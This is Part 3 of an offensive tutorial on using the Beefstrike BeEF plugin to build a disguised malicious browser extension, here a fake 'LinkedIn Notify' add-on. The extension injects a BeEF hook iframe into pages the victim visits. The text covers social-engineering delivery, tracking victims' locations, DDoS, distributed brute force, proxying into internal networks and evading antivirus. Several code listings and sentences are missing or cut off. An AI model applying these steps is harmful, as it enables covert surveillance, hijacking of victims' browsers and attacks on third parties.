This is the Part 3 of our tutorial on BeEF and Armitage/Cobaltstrike Integration: (Build botnet of browsers by using malicious extensions).
Now that you are familiar with BeEF and the Armitage/Cobaltstrike integration by using Beefstrike, it's time to introduce a major limitation and how to overcome it.
The use of a malicious extension, can setup a deep persistence for BeEF on the victim’s browser and that is a big advantage. Fortunately, Beefstrike can help you in this process.
, uncompress it and point Beefstrike to the kango.py file contained in the archive.
Go to BeEF --> Attack --> Browser Extension --> Path to Kango.
Fill the message box with the absolute path of kango.py.
The HTML code injected by beefstike consists of an iframe which points to a web page with the BeEF’s hook.
Go to BeEF --> Attack --> Browser Extension --> Beef-Implant.
You have to follow the instructions provided in each message box, carefully. The first step in this process is to create the project. Beefstrike pushes an external window using xterm. You have to use it and name your project. For this tutorial, we have created a fake LinkedIn browser extension named “LinkedIn Notify”.
When you create a project, a new folder will be created to host the files of that project. You can find these files in:
There are two other important steps in this process. The first is the HTML code that will be injected. Keep in mind that this code will be injected through a script looking like this:
document.body.innerHTML = document.body.innerHTML + [CODE_TO_INJECT];
And the default code to inject looks like this:
You can manually modify the extension code before generating it. The file to modify is content.js. It is located at: BeEF_folder/extensions/beefstrike/plugins/PROJECT_NAME/src/common/content.js.
The second important step is the modification of the project’s icon. By doing so, you can increase the success ratio of your social engineering scenario. Beefstrike comes with a set of icon packs ready to be used. Open the plugin_iconsfolder. In this folder, you have the icon pack for Twitter, LinkedIn, and Facebook. You can use one of them or create your own icon pack. Each pack has five icons with different sizes. You must respect these sizes if you plan to create your own icon pack. Changing the icon of your project using an icon pack is simple. Just copy the icons and paste them into the project folder of icons. The path is:
Delivery and installation
The methods used to deliver a browser extension are substantially the same as those encountered on attacks that rely on social engineering. The most efficient ways are email and social networks. For installation, there are constraints that differ depending on the browser. For example, Chrome only allows the installation of extensions from the official Chrome Web Store repository and not from third-party websites, while Firefox allows it. We will not dwell on this point but you have to be aware of that.
When you use a malicious extension, you must keep in mind that if the browser is closed, the link with C&C server will be broken. When the browser is open again, the link is re-established. Indeed, our malicious extension will perform an HTML injection attack on every unsecured page visited by the victim with BeEF’s hook as the payload. This makes possible a long-term engagement. The word “botnet” makes sense. In fact, BeEF operates like a botnet in design. But the limitation here is the availability of bots or zombies when needed. This is because the availability of zombies is usually conditioned by their effective presence on the booby-trapped page. When you though, this is a highly variable parameter. With our extension installed on a number of browsers, we have a ready-to-use botnet. Botnets are often related to a specific kind of attacks like distributed attacks or espionage.
As we saw in Part 02 of this tutorial:
- Beefstrike automatically geo-locates every new zombie based on their IP address once they join the horde. If a zombie leaves the horde and comes back again, his new position will be kept in a tracking table and we can visualize the resulting tracking map later. To obtain a tracking map, go to BeEF --> View --> Geolocation --> Geo Tracking. Select an entry on the tab, right click and select “see map” or “Track”. With the long persistence enabled by the extension, the tracking feature can provide some valuable information about the user’s habits.
- Beefstrike performs DDoS attacks. DDOS is well known to be driven even by primitive botnets. You can easily simulate this kind of attack with your botnet of browser extensions. Go to BeEF --> Attacks --> DDoS.
- Beefstrike can assist to perform Distributed brute-force attack
Distributed brute-force attack using Ravan
. We reduce the HTML code as you will see here. The file worker.php
With the resulting code of listing 1, zombies will become workers once the job URL is submitted to them. It is possible to check the status of a job for a particular worker. Right click on a zombie entry in the “zombies” tab.
Go to Attack->Raw JS.
You can set up a tunnel by right-clicking on a zombie listed in the “zombies” tab and select Attack --> Proxify.
Once the proxy tunnel has been set up, you can start browsing the victim’s internal network web resources. You have to modify your browser’s proxy configuration and use BeEF’s proxy parameters. BeEF’s team explains this process very well. I recommend you to take a look at their blog.
Much antivirus software is not able to identify a malicious browser extension as is and remove it. This is another reason why this kind of attack represents a serious threat to your privacy.
BeEF hooks are not always detected by most AV and they can be compressed and obfuscated by changing some lines in the configuration files of BeEF. We used the Virustotal service to view the detection rate of this extension as a malicious extension. The result obtained is not reassuring as you can see in. It’s still alarming to see how this simple hacking trick can pass through the mesh of the nets of much antivirus software. The malicious extension of this scenario uses a basic iFrame injection. No special tricks have been used to make the detection harder for defensive solutions. A video demo to illustrate how this extension works is coming soon!
Thanks for your reading, and hack responsibly.